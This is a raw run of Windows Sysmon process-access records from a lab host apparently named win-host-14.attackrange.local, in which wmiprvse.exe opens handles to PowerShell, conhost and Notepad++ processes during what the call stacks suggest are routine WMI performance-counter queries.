21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150693Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150692Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150691Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150690Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150689Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150688Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150687Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150686Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150685Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150684Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150683Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150682Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150681Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150680Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150679Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150678Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 